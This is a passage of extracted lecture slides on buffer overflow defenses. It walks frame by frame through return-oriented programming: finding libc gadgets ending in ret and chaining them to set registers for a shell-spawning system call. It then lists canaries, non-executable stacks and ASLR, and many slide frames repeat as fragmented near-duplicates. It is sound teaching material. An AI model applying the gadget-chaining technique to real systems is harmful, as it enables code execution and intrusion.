CODE SEQUENCES IN LIBCCode sequences exist in libc that
were not placed there by the compiler
Find code sequences by starting at ret’s (‘0xc3’) and looking backwards for valid instructions
![Page 58: BUFFER OVERFLOW DEFENSES & COUNTERMEASURES · 1. Terminator canaries (CR, LF, NULL, -1) • Leverages the fact that scanf etc. don’t allow these 2. Random canaries • Write a new](https://reader034.vdocument.in/reader034/viewer/2022042309/5ed6f09cff4a11075f771584/html5/thumbnails/58.jpg)
GADGETSmov %ebp %esp
pop %ebp
pop %eip
leave:
ret:
![Page 59: BUFFER OVERFLOW DEFENSES & COUNTERMEASURES · 1. Terminator canaries (CR, LF, NULL, -1) • Leverages the fact that scanf etc. don’t allow these 2. Random canaries • Write a new](https://reader034.vdocument.in/reader034/viewer/2022042309/5ed6f09cff4a11075f771584/html5/thumbnails/59.jpg)
GADGETSmov %ebp %esp
pop %ebp
pop %eip
leave:
ret:
![Page 60: BUFFER OVERFLOW DEFENSES & COUNTERMEASURES · 1. Terminator canaries (CR, LF, NULL, -1) • Leverages the fact that scanf etc. don’t allow these 2. Random canaries • Write a new](https://reader034.vdocument.in/reader034/viewer/2022042309/5ed6f09cff4a11075f771584/html5/thumbnails/60.jpg)
GADGETSmov %ebp %esp
pop %ebp
pop %eip
leave:
ret:
%edx now set to 0xdeadbeef
![Page 61: BUFFER OVERFLOW DEFENSES & COUNTERMEASURES · 1. Terminator canaries (CR, LF, NULL, -1) • Leverages the fact that scanf etc. don’t allow these 2. Random canaries • Write a new](https://reader034.vdocument.in/reader034/viewer/2022042309/5ed6f09cff4a11075f771584/html5/thumbnails/61.jpg)
GADGETSmov %ebp %esp
pop %ebp
pop %eip
leave:
ret:
Effect: sets %edx to 0xdeadbeef
![Page 62: BUFFER OVERFLOW DEFENSES & COUNTERMEASURES · 1. Terminator canaries (CR, LF, NULL, -1) • Leverages the fact that scanf etc. don’t allow these 2. Random canaries • Write a new](https://reader034.vdocument.in/reader034/viewer/2022042309/5ed6f09cff4a11075f771584/html5/thumbnails/62.jpg)
GADGETSmov %ebp %esp
pop %ebp
pop %eip
leave:
ret:
%edx
%eax
%edi7
3
![Page 63: BUFFER OVERFLOW DEFENSES & COUNTERMEASURES · 1. Terminator canaries (CR, LF, NULL, -1) • Leverages the fact that scanf etc. don’t allow these 2. Random canaries • Write a new](https://reader034.vdocument.in/reader034/viewer/2022042309/5ed6f09cff4a11075f771584/html5/thumbnails/63.jpg)
GADGETSmov %ebp %esp
pop %ebp
pop %eip
leave:
ret:
%edx
%eax
%edi7
3
![Page 64: BUFFER OVERFLOW DEFENSES & COUNTERMEASURES · 1. Terminator canaries (CR, LF, NULL, -1) • Leverages the fact that scanf etc. don’t allow these 2. Random canaries • Write a new](https://reader034.vdocument.in/reader034/viewer/2022042309/5ed6f09cff4a11075f771584/html5/thumbnails/64.jpg)
GADGETS
%edx
%eax
mov %ebp %esp
pop %ebp
pop %eip
leave:
ret:
%edi7
3
![Page 65: BUFFER OVERFLOW DEFENSES & COUNTERMEASURES · 1. Terminator canaries (CR, LF, NULL, -1) • Leverages the fact that scanf etc. don’t allow these 2. Random canaries • Write a new](https://reader034.vdocument.in/reader034/viewer/2022042309/5ed6f09cff4a11075f771584/html5/thumbnails/65.jpg)
GADGETS
%edx
%eax
mov %ebp %esp
pop %ebp
pop %eip
leave:
ret:
%edi7
3
![Page 66: BUFFER OVERFLOW DEFENSES & COUNTERMEASURES · 1. Terminator canaries (CR, LF, NULL, -1) • Leverages the fact that scanf etc. don’t allow these 2. Random canaries • Write a new](https://reader034.vdocument.in/reader034/viewer/2022042309/5ed6f09cff4a11075f771584/html5/thumbnails/66.jpg)
GADGETS
%edx
%eax
mov %ebp %esp
pop %ebp
pop %eip
leave:
ret:
%edi7
3
![Page 67: BUFFER OVERFLOW DEFENSES & COUNTERMEASURES · 1. Terminator canaries (CR, LF, NULL, -1) • Leverages the fact that scanf etc. don’t allow these 2. Random canaries • Write a new](https://reader034.vdocument.in/reader034/viewer/2022042309/5ed6f09cff4a11075f771584/html5/thumbnails/67.jpg)
GADGETS
%edx
%eax
mov %ebp %esp
pop %ebp
pop %eip
leave:
ret:
%edi77
3
![Page 68: BUFFER OVERFLOW DEFENSES & COUNTERMEASURES · 1. Terminator canaries (CR, LF, NULL, -1) • Leverages the fact that scanf etc. don’t allow these 2. Random canaries • Write a new](https://reader034.vdocument.in/reader034/viewer/2022042309/5ed6f09cff4a11075f771584/html5/thumbnails/68.jpg)
GADGETS
%edx
%eax
mov %ebp %esp
pop %ebp
pop %eip
leave:
ret:
%edi77
3
![Page 69: BUFFER OVERFLOW DEFENSES & COUNTERMEASURES · 1. Terminator canaries (CR, LF, NULL, -1) • Leverages the fact that scanf etc. don’t allow these 2. Random canaries • Write a new](https://reader034.vdocument.in/reader034/viewer/2022042309/5ed6f09cff4a11075f771584/html5/thumbnails/69.jpg)
GADGETS
%edx
%eax
mov %ebp %esp
pop %ebp
pop %eip
leave:
ret:
%edi77
3
![Page 70: BUFFER OVERFLOW DEFENSES & COUNTERMEASURES · 1. Terminator canaries (CR, LF, NULL, -1) • Leverages the fact that scanf etc. don’t allow these 2. Random canaries • Write a new](https://reader034.vdocument.in/reader034/viewer/2022042309/5ed6f09cff4a11075f771584/html5/thumbnails/70.jpg)
GADGETS
%edx
%eax
mov %ebp %esp
pop %ebp
pop %eip
leave:
ret:
%edi7
3
7
![Page 71: BUFFER OVERFLOW DEFENSES & COUNTERMEASURES · 1. Terminator canaries (CR, LF, NULL, -1) • Leverages the fact that scanf etc. don’t allow these 2. Random canaries • Write a new](https://reader034.vdocument.in/reader034/viewer/2022042309/5ed6f09cff4a11075f771584/html5/thumbnails/71.jpg)
GADGETS
%edx
%eax
mov %ebp %esp
pop %ebp
pop %eip
leave:
ret:
%edi7
10
7
![Page 72: BUFFER OVERFLOW DEFENSES & COUNTERMEASURES · 1. Terminator canaries (CR, LF, NULL, -1) • Leverages the fact that scanf etc. don’t allow these 2. Random canaries • Write a new](https://reader034.vdocument.in/reader034/viewer/2022042309/5ed6f09cff4a11075f771584/html5/thumbnails/72.jpg)
GADGETS
%edx
%eax
mov %ebp %esp
pop %ebp
pop %eip
leave:
ret:
%edi7
10
7
![Page 73: BUFFER OVERFLOW DEFENSES & COUNTERMEASURES · 1. Terminator canaries (CR, LF, NULL, -1) • Leverages the fact that scanf etc. don’t allow these 2. Random canaries • Write a new](https://reader034.vdocument.in/reader034/viewer/2022042309/5ed6f09cff4a11075f771584/html5/thumbnails/73.jpg)
GADGETS
%edx
%eax
mov %ebp %esp
pop %ebp
pop %eip
leave:
ret:
%edi7
10
7
![Page 74: BUFFER OVERFLOW DEFENSES & COUNTERMEASURES · 1. Terminator canaries (CR, LF, NULL, -1) • Leverages the fact that scanf etc. don’t allow these 2. Random canaries • Write a new](https://reader034.vdocument.in/reader034/viewer/2022042309/5ed6f09cff4a11075f771584/html5/thumbnails/74.jpg)
GADGETS
%edx
%eax
mov %ebp %esp
pop %ebp
pop %eip
leave:
ret:
%edi7
10
7
![Page 75: BUFFER OVERFLOW DEFENSES & COUNTERMEASURES · 1. Terminator canaries (CR, LF, NULL, -1) • Leverages the fact that scanf etc. don’t allow these 2. Random canaries • Write a new](https://reader034.vdocument.in/reader034/viewer/2022042309/5ed6f09cff4a11075f771584/html5/thumbnails/75.jpg)
GADGETS
%edx
%eax
%edi7
10
7
next gadget
![Page 76: BUFFER OVERFLOW DEFENSES & COUNTERMEASURES · 1. Terminator canaries (CR, LF, NULL, -1) • Leverages the fact that scanf etc. don’t allow these 2. Random canaries • Write a new](https://reader034.vdocument.in/reader034/viewer/2022042309/5ed6f09cff4a11075f771584/html5/thumbnails/76.jpg)
GADGETS
%edx
%eax
%edi7
10
7
next gadget
Effect: adds 7 to %eax
![Page 77: BUFFER OVERFLOW DEFENSES & COUNTERMEASURES · 1. Terminator canaries (CR, LF, NULL, -1) • Leverages the fact that scanf etc. don’t allow these 2. Random canaries • Write a new](https://reader034.vdocument.in/reader034/viewer/2022042309/5ed6f09cff4a11075f771584/html5/thumbnails/77.jpg)
GADGETS
%edx
%eax
%edi7
10
7
next gadget
Effect: adds 7 to %eax Had to deal with the side-effect of push %edi
![Page 78: BUFFER OVERFLOW DEFENSES & COUNTERMEASURES · 1. Terminator canaries (CR, LF, NULL, -1) • Leverages the fact that scanf etc. don’t allow these 2. Random canaries • Write a new](https://reader034.vdocument.in/reader034/viewer/2022042309/5ed6f09cff4a11075f771584/html5/thumbnails/78.jpg)
GADGETS
%eax
%ebx
%ecx
%edx
![Page 79: BUFFER OVERFLOW DEFENSES & COUNTERMEASURES · 1. Terminator canaries (CR, LF, NULL, -1) • Leverages the fact that scanf etc. don’t allow these 2. Random canaries • Write a new](https://reader034.vdocument.in/reader034/viewer/2022042309/5ed6f09cff4a11075f771584/html5/thumbnails/79.jpg)
GADGETS
%eax
%ebx
%ecx
%edx
0
![Page 80: BUFFER OVERFLOW DEFENSES & COUNTERMEASURES · 1. Terminator canaries (CR, LF, NULL, -1) • Leverages the fact that scanf etc. don’t allow these 2. Random canaries • Write a new](https://reader034.vdocument.in/reader034/viewer/2022042309/5ed6f09cff4a11075f771584/html5/thumbnails/80.jpg)
GADGETS
%eax
%ebx
%ecx
%edx
0
![Page 81: BUFFER OVERFLOW DEFENSES & COUNTERMEASURES · 1. Terminator canaries (CR, LF, NULL, -1) • Leverages the fact that scanf etc. don’t allow these 2. Random canaries • Write a new](https://reader034.vdocument.in/reader034/viewer/2022042309/5ed6f09cff4a11075f771584/html5/thumbnails/81.jpg)
GADGETS
%eax
%ebx
%ecx
%edx
0
0x0b0b0b0b
![Page 82: BUFFER OVERFLOW DEFENSES & COUNTERMEASURES · 1. Terminator canaries (CR, LF, NULL, -1) • Leverages the fact that scanf etc. don’t allow these 2. Random canaries • Write a new](https://reader034.vdocument.in/reader034/viewer/2022042309/5ed6f09cff4a11075f771584/html5/thumbnails/82.jpg)
GADGETS
%eax
%ebx
%ecx
%edx
0
0x0b0b0b0b
![Page 83: BUFFER OVERFLOW DEFENSES & COUNTERMEASURES · 1. Terminator canaries (CR, LF, NULL, -1) • Leverages the fact that scanf etc. don’t allow these 2. Random canaries • Write a new](https://reader034.vdocument.in/reader034/viewer/2022042309/5ed6f09cff4a11075f771584/html5/thumbnails/83.jpg)
GADGETS
%eax
%ebx
%ecx
%edx
0
0x0b0b0b0b
![Page 84: BUFFER OVERFLOW DEFENSES & COUNTERMEASURES · 1. Terminator canaries (CR, LF, NULL, -1) • Leverages the fact that scanf etc. don’t allow these 2. Random canaries • Write a new](https://reader034.vdocument.in/reader034/viewer/2022042309/5ed6f09cff4a11075f771584/html5/thumbnails/84.jpg)
GADGETS
%eax
%ebx
%ecx
%edx
0
0x0b0b0b0b
0
![Page 85: BUFFER OVERFLOW DEFENSES & COUNTERMEASURES · 1. Terminator canaries (CR, LF, NULL, -1) • Leverages the fact that scanf etc. don’t allow these 2. Random canaries • Write a new](https://reader034.vdocument.in/reader034/viewer/2022042309/5ed6f09cff4a11075f771584/html5/thumbnails/85.jpg)
GADGETS
%eax
%ebx
%ecx
%edx
0xb
0x0b0b0b0b
0
![Page 86: BUFFER OVERFLOW DEFENSES & COUNTERMEASURES · 1. Terminator canaries (CR, LF, NULL, -1) • Leverages the fact that scanf etc. don’t allow these 2. Random canaries • Write a new](https://reader034.vdocument.in/reader034/viewer/2022042309/5ed6f09cff4a11075f771584/html5/thumbnails/86.jpg)
GADGETS
%eax
%ebx
%ecx
%edx
0xb
0x0b0b0b0b
0
![Page 87: BUFFER OVERFLOW DEFENSES & COUNTERMEASURES · 1. Terminator canaries (CR, LF, NULL, -1) • Leverages the fact that scanf etc. don’t allow these 2. Random canaries • Write a new](https://reader034.vdocument.in/reader034/viewer/2022042309/5ed6f09cff4a11075f771584/html5/thumbnails/87.jpg)
GADGETS
%eax
%ebx
%ecx
%edx
0xb
0x0b0b0b0b
0
![Page 88: BUFFER OVERFLOW DEFENSES & COUNTERMEASURES · 1. Terminator canaries (CR, LF, NULL, -1) • Leverages the fact that scanf etc. don’t allow these 2. Random canaries • Write a new](https://reader034.vdocument.in/reader034/viewer/2022042309/5ed6f09cff4a11075f771584/html5/thumbnails/88.jpg)
GADGETS
%eax
%ebx
%ecx
%edx
0xb
0x0b0b0b0b
0
![Page 89: BUFFER OVERFLOW DEFENSES & COUNTERMEASURES · 1. Terminator canaries (CR, LF, NULL, -1) • Leverages the fact that scanf etc. don’t allow these 2. Random canaries • Write a new](https://reader034.vdocument.in/reader034/viewer/2022042309/5ed6f09cff4a11075f771584/html5/thumbnails/89.jpg)
GADGETS
%eax
%ebx
%ecx
%edx
0xb0
![Page 90: BUFFER OVERFLOW DEFENSES & COUNTERMEASURES · 1. Terminator canaries (CR, LF, NULL, -1) • Leverages the fact that scanf etc. don’t allow these 2. Random canaries • Write a new](https://reader034.vdocument.in/reader034/viewer/2022042309/5ed6f09cff4a11075f771584/html5/thumbnails/90.jpg)
GADGETS
%eax
%ebx
%ecx
%edx
0xb0
![Page 91: BUFFER OVERFLOW DEFENSES & COUNTERMEASURES · 1. Terminator canaries (CR, LF, NULL, -1) • Leverages the fact that scanf etc. don’t allow these 2. Random canaries • Write a new](https://reader034.vdocument.in/reader034/viewer/2022042309/5ed6f09cff4a11075f771584/html5/thumbnails/91.jpg)
GADGETS
%eax
%ebx
%ecx
%edx
0xb0
![Page 92: BUFFER OVERFLOW DEFENSES & COUNTERMEASURES · 1. Terminator canaries (CR, LF, NULL, -1) • Leverages the fact that scanf etc. don’t allow these 2. Random canaries • Write a new](https://reader034.vdocument.in/reader034/viewer/2022042309/5ed6f09cff4a11075f771584/html5/thumbnails/92.jpg)
GADGETS
%eax
%ebx
%ecx
%edx
0xb0
Effect: shell code
![Page 93: BUFFER OVERFLOW DEFENSES & COUNTERMEASURES · 1. Terminator canaries (CR, LF, NULL, -1) • Leverages the fact that scanf etc. don’t allow these 2. Random canaries • Write a new](https://reader034.vdocument.in/reader034/viewer/2022042309/5ed6f09cff4a11075f771584/html5/thumbnails/93.jpg)
RECALL OUR CHALLENGES
• Putting code into the memory (no zeroes)
• Getting %eip to point to our code (dist buff to stored eip)
• Finding the return address (guess the raw address)
How can we make these even more difficult?
Option: Make this detectable with canaries
Non-executable stack doesn’t work so well
Address Space Layout Randomization (ASLR)
Best defense: Good programming practices
![Page 94: BUFFER OVERFLOW DEFENSES & COUNTERMEASURES · 1. Terminator canaries (CR, LF, NULL, -1) • Leverages the fact that scanf etc. don’t allow these 2. Random canaries • Write a new](https://reader034.vdocument.in/reader034/viewer/2022042309/5ed6f09cff4a11075f771584/html5/thumbnails/94.jpg)
BUFFER OVERFLOW PREVALENCE
0
4
8
12
16
1997 1999 2001 2003 2005 2007 2009 2011 2013 2015
Significant percent of all vulnerabilities
Data from the National Vulnerability Database